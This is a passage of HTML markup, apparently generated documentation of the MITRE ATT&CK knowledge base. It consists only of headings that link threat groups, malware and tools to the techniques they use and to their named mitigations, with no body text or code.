<h3 id="_apt3_g0022_uses_rundll32_t1085"><a class="anchor" href="#_apt3_g0022_uses_rundll32_t1085"></a><a class="link" href="#_apt3_g0022_uses_rundll32_t1085">APT3 (G0022) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_winmm_s0059"><a class="anchor" href="#_naikon_g0019_uses_winmm_s0059"></a><a class="link" href="#_naikon_g0019_uses_winmm_s0059">Naikon (G0019) uses WinMM (S0059)</a></h3>
</div>
<div class="sect2">
<h3 id="_systeminfo_s0096_uses_system_information_discovery_t1082"><a class="anchor" href="#_systeminfo_s0096_uses_system_information_discovery_t1082"></a><a class="link" href="#_systeminfo_s0096_uses_system_information_discovery_t1082">Systeminfo (S0096) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_ifconfig_s0101_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_ifconfig_s0101_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_ifconfig_s0101_uses_system_network_configuration_discovery_t1016">ifconfig (S0101) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_fallchill_s0181_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_fallchill_s0181_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_fallchill_s0181_uses_file_and_directory_discovery_t1083">FALLCHILL (S0181) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_fallback_channels_mitigation_t1008_mitigates_fallback_channels_t1008"><a class="anchor" href="#_fallback_channels_mitigation_t1008_mitigates_fallback_channels_t1008"></a><a class="link" href="#_fallback_channels_mitigation_t1008_mitigates_fallback_channels_t1008">Fallback Channels Mitigation (T1008) mitigates Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_poshspy_s0150_uses_data_transfer_size_limits_t1030"><a class="anchor" href="#_poshspy_s0150_uses_data_transfer_size_limits_t1030"></a><a class="link" href="#_poshspy_s0150_uses_data_transfer_size_limits_t1030">POSHSPY (S0150) uses Data Transfer Size Limits (T1030)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_commonly_used_port_t1043"><a class="anchor" href="#_dragonfly_g0035_uses_commonly_used_port_t1043"></a><a class="link" href="#_dragonfly_g0035_uses_commonly_used_port_t1043">Dragonfly (G0035) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_pisloader_s0124_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_pisloader_s0124_uses_file_and_directory_discovery_t1083">Pisloader (S0124) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_clipboard_data_mitigation_t1115_mitigates_clipboard_data_t1115"><a class="anchor" href="#_clipboard_data_mitigation_t1115_mitigates_clipboard_data_t1115"></a><a class="link" href="#_clipboard_data_mitigation_t1115_mitigates_clipboard_data_t1115">Clipboard Data Mitigation (T1115) mitigates Clipboard Data (T1115)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_redleaves_s0153_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_redleaves_s0153_uses_file_and_directory_discovery_t1083">RedLeaves (S0153) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_chopstick_s0023_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_chopstick_s0023_uses_file_and_directory_discovery_t1083">CHOPSTICK (S0023) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_remote_file_copy_t1105"><a class="anchor" href="#_badnews_s0128_uses_remote_file_copy_t1105"></a><a class="link" href="#_badnews_s0128_uses_remote_file_copy_t1105">BADNEWS (S0128) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_scheduled_task_t1053"><a class="anchor" href="#_threat_group_3390_g0027_uses_scheduled_task_t1053"></a><a class="link" href="#_threat_group_3390_g0027_uses_scheduled_task_t1053">Threat Group-3390 (G0027) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_process_injection_mitigation_t1055_mitigates_process_injection_t1055"><a class="anchor" href="#_process_injection_mitigation_t1055_mitigates_process_injection_t1055"></a><a class="link" href="#_process_injection_mitigation_t1055_mitigates_process_injection_t1055">Process Injection Mitigation (T1055) mitigates Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_poseidon_group_g0033_uses_process_discovery_t1057"><a class="anchor" href="#_poseidon_group_g0033_uses_process_discovery_t1057"></a><a class="link" href="#_poseidon_group_g0033_uses_process_discovery_t1057">Poseidon Group (G0033) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_powershell_t1086"><a class="anchor" href="#_patchwork_g0040_uses_powershell_t1086"></a><a class="link" href="#_patchwork_g0040_uses_powershell_t1086">Patchwork (G0040) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_system_information_discovery_t1082"><a class="anchor" href="#_xagentosx_s0161_uses_system_information_discovery_t1082"></a><a class="link" href="#_xagentosx_s0161_uses_system_information_discovery_t1082">XAgentOSX (S0161) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_data_obfuscation_t1001"><a class="anchor" href="#_badnews_s0128_uses_data_obfuscation_t1001"></a><a class="link" href="#_badnews_s0128_uses_data_obfuscation_t1001">BADNEWS (S0128) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_input_capture_t1056"><a class="anchor" href="#_blackenergy_s0089_uses_input_capture_t1056"></a><a class="link" href="#_blackenergy_s0089_uses_input_capture_t1056">BlackEnergy (S0089) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_streamex_s0142_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_streamex_s0142_uses_obfuscated_files_or_information_t1027">StreamEx (S0142) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_appinit_dlls_t1103"><a class="anchor" href="#_t9000_s0098_uses_appinit_dlls_t1103"></a><a class="link" href="#_t9000_s0098_uses_appinit_dlls_t1103">T9000 (S0098) uses AppInit DLLs (T1103)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_cobalt_strike_s0154_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_cobalt_strike_s0154_uses_remote_desktop_protocol_t1076">Cobalt Strike (S0154) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_aspxspy_s0073"><a class="anchor" href="#_threat_group_3390_g0027_uses_aspxspy_s0073"></a><a class="link" href="#_threat_group_3390_g0027_uses_aspxspy_s0073">Threat Group-3390 (G0027) uses ASPXSpy (S0073)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_neteagle_s0034_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_neteagle_s0034_uses_file_and_directory_discovery_t1083">NETEAGLE (S0034) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_karagany_s0094_uses_remote_file_copy_t1105"><a class="anchor" href="#_trojan_karagany_s0094_uses_remote_file_copy_t1105"></a><a class="link" href="#_trojan_karagany_s0094_uses_remote_file_copy_t1105">Trojan.Karagany (S0094) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_automated_exfiltration_t1020"><a class="anchor" href="#_cosmicduke_s0050_uses_automated_exfiltration_t1020"></a><a class="link" href="#_cosmicduke_s0050_uses_automated_exfiltration_t1020">CosmicDuke (S0050) uses Automated Exfiltration (T1020)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_mis_type_s0084_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_mis_type_s0084_uses_standard_application_layer_protocol_t1071">Mis-Type (S0084) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_t9000_s0098_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_t9000_s0098_uses_system_owner_user_discovery_t1033">T9000 (S0098) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_communication_through_removable_media_t1092"><a class="anchor" href="#_chopstick_s0023_uses_communication_through_removable_media_t1092"></a><a class="link" href="#_chopstick_s0023_uses_communication_through_removable_media_t1092">CHOPSTICK (S0023) uses Communication Through Removable Media (T1092)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_automated_collection_t1119"><a class="anchor" href="#_helminth_s0170_uses_automated_collection_t1119"></a><a class="link" href="#_helminth_s0170_uses_automated_collection_t1119">Helminth (S0170) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_powershell_t1086"><a class="anchor" href="#_fin10_g0051_uses_powershell_t1086"></a><a class="link" href="#_fin10_g0051_uses_powershell_t1086">FIN10 (G0051) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_masquerading_t1036"><a class="anchor" href="#_dragonfly_g0035_uses_masquerading_t1036"></a><a class="link" href="#_dragonfly_g0035_uses_masquerading_t1036">Dragonfly (G0035) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_osinfo_s0165"><a class="anchor" href="#_apt3_g0022_uses_osinfo_s0165"></a><a class="link" href="#_apt3_g0022_uses_osinfo_s0165">APT3 (G0022) uses OSInfo (S0165)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_credential_dumping_t1003"><a class="anchor" href="#_apt34_g0057_uses_credential_dumping_t1003"></a><a class="link" href="#_apt34_g0057_uses_credential_dumping_t1003">APT34 (G0057) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_moafee_g0002_uses_poisonivy_s0012"><a class="anchor" href="#_moafee_g0002_uses_poisonivy_s0012"></a><a class="link" href="#_moafee_g0002_uses_poisonivy_s0012">Moafee (G0002) uses PoisonIvy (S0012)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_external_remote_services_t1133"><a class="anchor" href="#_apt34_g0057_uses_external_remote_services_t1133"></a><a class="link" href="#_apt34_g0057_uses_external_remote_services_t1133">APT34 (G0057) uses External Remote Services (T1133)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_audio_capture_t1123"><a class="anchor" href="#_t9000_s0098_uses_audio_capture_t1123"></a><a class="link" href="#_t9000_s0098_uses_audio_capture_t1123">T9000 (S0098) uses Audio Capture (T1123)</a></h3>
</div>
<div class="sect2">
<h3 id="_masquerading_mitigation_t1036_mitigates_masquerading_t1036"><a class="anchor" href="#_masquerading_mitigation_t1036_mitigates_masquerading_t1036"></a><a class="link" href="#_masquerading_mitigation_t1036_mitigates_masquerading_t1036">Masquerading Mitigation (T1036) mitigates Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_poseidon_group_g0033_uses_account_discovery_t1087"><a class="anchor" href="#_poseidon_group_g0033_uses_account_discovery_t1087"></a><a class="link" href="#_poseidon_group_g0033_uses_account_discovery_t1087">Poseidon Group (G0033) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_poseidon_group_g0033_uses_system_service_discovery_t1007"><a class="anchor" href="#_poseidon_group_g0033_uses_system_service_discovery_t1007"></a><a class="link" href="#_poseidon_group_g0033_uses_system_service_discovery_t1007">Poseidon Group (G0033) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_fallback_channels_t1008"><a class="anchor" href="#_blackenergy_s0089_uses_fallback_channels_t1008"></a><a class="link" href="#_blackenergy_s0089_uses_fallback_channels_t1008">BlackEnergy (S0089) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_poshspy_s0150_uses_timestomp_t1099"><a class="anchor" href="#_poshspy_s0150_uses_timestomp_t1099"></a><a class="link" href="#_poshspy_s0150_uses_timestomp_t1099">POSHSPY (S0150) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_command_line_interface_t1059"><a class="anchor" href="#_derusbi_s0021_uses_command_line_interface_t1059"></a><a class="link" href="#_derusbi_s0021_uses_command_line_interface_t1059">Derusbi (S0021) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_biscuit_s0017"><a class="anchor" href="#_apt1_g0006_uses_biscuit_s0017"></a><a class="link" href="#_apt1_g0006_uses_biscuit_s0017">APT1 (G0006) uses BISCUIT (S0017)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_data_compressed_t1002"><a class="anchor" href="#_seaduke_s0053_uses_data_compressed_t1002"></a><a class="link" href="#_seaduke_s0053_uses_data_compressed_t1002">SeaDuke (S0053) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_tasklist_s0057"><a class="anchor" href="#_deep_panda_g0009_uses_tasklist_s0057"></a><a class="link" href="#_deep_panda_g0009_uses_tasklist_s0057">Deep Panda (G0009) uses Tasklist (S0057)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_valid_accounts_t1078"><a class="anchor" href="#_duqu_s0038_uses_valid_accounts_t1078"></a><a class="link" href="#_duqu_s0038_uses_valid_accounts_t1078">Duqu (S0038) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_dsquery_s0105_uses_account_discovery_t1087"><a class="anchor" href="#_dsquery_s0105_uses_account_discovery_t1087"></a><a class="link" href="#_dsquery_s0105_uses_account_discovery_t1087">dsquery (S0105) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_local_job_scheduling_mitigation_t1168_mitigates_local_job_scheduling_t1168"><a class="anchor" href="#_local_job_scheduling_mitigation_t1168_mitigates_local_job_scheduling_t1168"></a><a class="link" href="#_local_job_scheduling_mitigation_t1168_mitigates_local_job_scheduling_t1168">Local Job Scheduling Mitigation (T1168) mitigates Local Job Scheduling (T1168)</a></h3>
</div>
<div class="sect2">
<h3 id="_poshspy_s0150_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_poshspy_s0150_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_poshspy_s0150_uses_standard_cryptographic_protocol_t1032">POSHSPY (S0150) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_uroburos_s0022_uses_rootkit_t1014"><a class="anchor" href="#_uroburos_s0022_uses_rootkit_t1014"></a><a class="link" href="#_uroburos_s0022_uses_rootkit_t1014">Uroburos (S0022) uses Rootkit (T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_input_capture_t1056"><a class="anchor" href="#_duqu_s0038_uses_input_capture_t1056"></a><a class="link" href="#_duqu_s0038_uses_input_capture_t1056">Duqu (S0038) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_epic_s0091_uses_code_signing_t1116"><a class="anchor" href="#_epic_s0091_uses_code_signing_t1116"></a><a class="link" href="#_epic_s0091_uses_code_signing_t1116">Epic (S0091) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004_uses_screen_capture_t1113"><a class="anchor" href="#_tinyzbot_s0004_uses_screen_capture_t1113"></a><a class="link" href="#_tinyzbot_s0004_uses_screen_capture_t1113">TinyZBot (S0004) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_derusbi_s0021"><a class="anchor" href="#_deep_panda_g0009_uses_derusbi_s0021"></a><a class="link" href="#_deep_panda_g0009_uses_derusbi_s0021">Deep Panda (G0009) uses Derusbi (S0021)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_input_capture_t1056"><a class="anchor" href="#_apt34_g0057_uses_input_capture_t1056"></a><a class="link" href="#_apt34_g0057_uses_input_capture_t1056">APT34 (G0057) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_molerats_g0021_uses_process_discovery_t1057"><a class="anchor" href="#_molerats_g0021_uses_process_discovery_t1057"></a><a class="link" href="#_molerats_g0021_uses_process_discovery_t1057">Molerats (G0021) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_data_obfuscation_t1001"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_data_obfuscation_t1001"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_data_obfuscation_t1001">Backdoor.Oldrea (S0093) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_chches_s0144_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_chches_s0144_uses_standard_cryptographic_protocol_t1032">ChChes (S0144) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_event_subscription_mitigation_t1084_mitigates_windows_management_instrumentation_event_subscription_t1084"><a class="anchor" href="#_windows_management_instrumentation_event_subscription_mitigation_t1084_mitigates_windows_management_instrumentation_event_subscription_t1084"></a><a class="link" href="#_windows_management_instrumentation_event_subscription_mitigation_t1084_mitigates_windows_management_instrumentation_event_subscription_t1084">Windows Management Instrumentation Event Subscription Mitigation (T1084) mitigates Windows Management Instrumentation Event Subscription (T1084)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_patchwork_g0040_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_patchwork_g0040_uses_system_owner_user_discovery_t1033">Patchwork (G0040) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_remote_file_copy_t1105"><a class="anchor" href="#_dustysky_s0062_uses_remote_file_copy_t1105"></a><a class="link" href="#_dustysky_s0062_uses_remote_file_copy_t1105">DustySky (S0062) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_staged_mitigation_t1074_mitigates_data_staged_t1074"><a class="anchor" href="#_data_staged_mitigation_t1074_mitigates_data_staged_t1074"></a><a class="link" href="#_data_staged_mitigation_t1074_mitigates_data_staged_t1074">Data Staged Mitigation (T1074) mitigates Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_security_software_discovery_t1063"><a class="anchor" href="#_rtm_s0148_uses_security_software_discovery_t1063"></a><a class="link" href="#_rtm_s0148_uses_security_software_discovery_t1063">RTM (S0148) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_snugride_s0159"><a class="anchor" href="#_menupass_g0045_uses_snugride_s0159"></a><a class="link" href="#_menupass_g0045_uses_snugride_s0159">menuPass (G0045) uses SNUGRIDE (S0159)</a></h3>
</div>
<div class="sect2">
<h3 id="_agent_btz_s0092_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_agent_btz_s0092_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_agent_btz_s0092_uses_replication_through_removable_media_t1091">Agent.btz (S0092) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_4h_rat_s0065_uses_system_information_discovery_t1082"><a class="anchor" href="#_4h_rat_s0065_uses_system_information_discovery_t1082"></a><a class="link" href="#_4h_rat_s0065_uses_system_information_discovery_t1082">4H RAT (S0065) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_prikormka_s0113_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_prikormka_s0113_uses_indicator_removal_on_host_t1070">Prikormka (S0113) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_bootrash_s0114_uses_bootkit_t1067"><a class="anchor" href="#_bootrash_s0114_uses_bootkit_t1067"></a><a class="link" href="#_bootrash_s0114_uses_bootkit_t1067">BOOTRASH (S0114) uses Bootkit (T1067)</a></h3>
</div>
<div class="sect2">
<h3 id="_ipconfig_s0100_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_ipconfig_s0100_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_ipconfig_s0100_uses_system_network_configuration_discovery_t1016">ipconfig (S0100) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_tasklist_s0057_uses_security_software_discovery_t1063"><a class="anchor" href="#_tasklist_s0057_uses_security_software_discovery_t1063"></a><a class="link" href="#_tasklist_s0057_uses_security_software_discovery_t1063">Tasklist (S0057) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_fallchill_s0181_uses_timestomp_t1099"><a class="anchor" href="#_fallchill_s0181_uses_timestomp_t1099"></a><a class="link" href="#_fallchill_s0181_uses_timestomp_t1099">FALLCHILL (S0181) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_system_information_discovery_t1082"><a class="anchor" href="#_pisloader_s0124_uses_system_information_discovery_t1082"></a><a class="link" href="#_pisloader_s0124_uses_system_information_discovery_t1082">Pisloader (S0124) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_remote_file_copy_t1105"><a class="anchor" href="#_httpbrowser_s0070_uses_remote_file_copy_t1105"></a><a class="link" href="#_httpbrowser_s0070_uses_remote_file_copy_t1105">HTTPBrowser (S0070) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_create_account_t1136"><a class="anchor" href="#_s_type_s0085_uses_create_account_t1136"></a><a class="link" href="#_s_type_s0085_uses_create_account_t1136">S-Type (S0085) uses Create Account (T1136)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_powruner_s0184_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_powruner_s0184_uses_file_and_directory_discovery_t1083">POWRUNER (S0184) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_external_remote_services_t1133"><a class="anchor" href="#_fin5_g0053_uses_external_remote_services_t1133"></a><a class="link" href="#_fin5_g0053_uses_external_remote_services_t1133">FIN5 (G0053) uses External Remote Services (T1133)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_input_capture_t1056"><a class="anchor" href="#_sykipot_s0018_uses_input_capture_t1056"></a><a class="link" href="#_sykipot_s0018_uses_input_capture_t1056">Sykipot (S0018) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_geminiduke_s0049_uses_process_discovery_t1057"><a class="anchor" href="#_geminiduke_s0049_uses_process_discovery_t1057"></a><a class="link" href="#_geminiduke_s0049_uses_process_discovery_t1057">GeminiDuke (S0049) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_timestomp_t1099"><a class="anchor" href="#_gazer_s0168_uses_timestomp_t1099"></a><a class="link" href="#_gazer_s0168_uses_timestomp_t1099">Gazer (S0168) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_scheduled_task_t1053"><a class="anchor" href="#_apt18_g0026_uses_scheduled_task_t1053"></a><a class="link" href="#_apt18_g0026_uses_scheduled_task_t1053">APT18 (G0026) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_window_discovery_mitigation_t1010_mitigates_application_window_discovery_t1010"><a class="anchor" href="#_application_window_discovery_mitigation_t1010_mitigates_application_window_discovery_t1010"></a><a class="link" href="#_application_window_discovery_mitigation_t1010_mitigates_application_window_discovery_t1010">Application Window Discovery Mitigation (T1010) mitigates Application Window Discovery (T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_data_staged_t1074"><a class="anchor" href="#_fin6_g0037_uses_data_staged_t1074"></a><a class="link" href="#_fin6_g0037_uses_data_staged_t1074">FIN6 (G0037) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_file_and_directory_discovery_mitigation_t1083_mitigates_file_and_directory_discovery_t1083"><a class="anchor" href="#_file_and_directory_discovery_mitigation_t1083_mitigates_file_and_directory_discovery_t1083"></a><a class="link" href="#_file_and_directory_discovery_mitigation_t1083_mitigates_file_and_directory_discovery_t1083">File and Directory Discovery Mitigation (T1083) mitigates File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_reaver_s0172_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_reaver_s0172_uses_system_owner_user_discovery_t1033">Reaver (S0172) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_felismus_s0171_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_felismus_s0171_uses_system_owner_user_discovery_t1033">Felismus (S0171) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_remote_file_copy_t1105"><a class="anchor" href="#_misdat_s0083_uses_remote_file_copy_t1105"></a><a class="link" href="#_misdat_s0083_uses_remote_file_copy_t1105">Misdat (S0083) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_s_type_s0085_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_s_type_s0085_uses_standard_application_layer_protocol_t1071">S-Type (S0085) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_certutil_s0160_uses_deobfuscate_decode_files_or_information_t1140"><a class="anchor" href="#_certutil_s0160_uses_deobfuscate_decode_files_or_information_t1140"></a><a class="link" href="#_certutil_s0160_uses_deobfuscate_decode_files_or_information_t1140">certutil (S0160) uses Deobfuscate/Decode Files or Information (T1140)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_remote_system_discovery_t1018"><a class="anchor" href="#_turla_g0010_uses_remote_system_discovery_t1018"></a><a class="link" href="#_turla_g0010_uses_remote_system_discovery_t1018">Turla (G0010) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_screen_capture_t1113"><a class="anchor" href="#_dragonfly_g0035_uses_screen_capture_t1113"></a><a class="link" href="#_dragonfly_g0035_uses_screen_capture_t1113">Dragonfly (G0035) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_data_staged_t1074"><a class="anchor" href="#_moonwind_s0149_uses_data_staged_t1074"></a><a class="link" href="#_moonwind_s0149_uses_data_staged_t1074">MoonWind (S0149) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_command_line_interface_t1059"><a class="anchor" href="#_mis_type_s0084_uses_command_line_interface_t1059"></a><a class="link" href="#_mis_type_s0084_uses_command_line_interface_t1059">Mis-Type (S0084) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_dust_storm_g0031_uses_data_from_local_system_t1005"><a class="anchor" href="#_dust_storm_g0031_uses_data_from_local_system_t1005"></a><a class="link" href="#_dust_storm_g0031_uses_data_from_local_system_t1005">Dust Storm (G0031) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_remote_file_copy_t1105"><a class="anchor" href="#_sakula_s0074_uses_remote_file_copy_t1105"></a><a class="link" href="#_sakula_s0074_uses_remote_file_copy_t1105">Sakula (S0074) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_mimikatz_s0002"><a class="anchor" href="#_oilrig_g0049_uses_mimikatz_s0002"></a><a class="link" href="#_oilrig_g0049_uses_mimikatz_s0002">OilRig (G0049) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_peripheral_device_discovery_mitigation_t1120_mitigates_peripheral_device_discovery_t1120"><a class="anchor" href="#_peripheral_device_discovery_mitigation_t1120_mitigates_peripheral_device_discovery_t1120"></a><a class="link" href="#_peripheral_device_discovery_mitigation_t1120_mitigates_peripheral_device_discovery_t1120">Peripheral Device Discovery Mitigation (T1120) mitigates Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_web_shell_t1100"><a class="anchor" href="#_apt34_g0057_uses_web_shell_t1100"></a><a class="link" href="#_apt34_g0057_uses_web_shell_t1100">APT34 (G0057) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
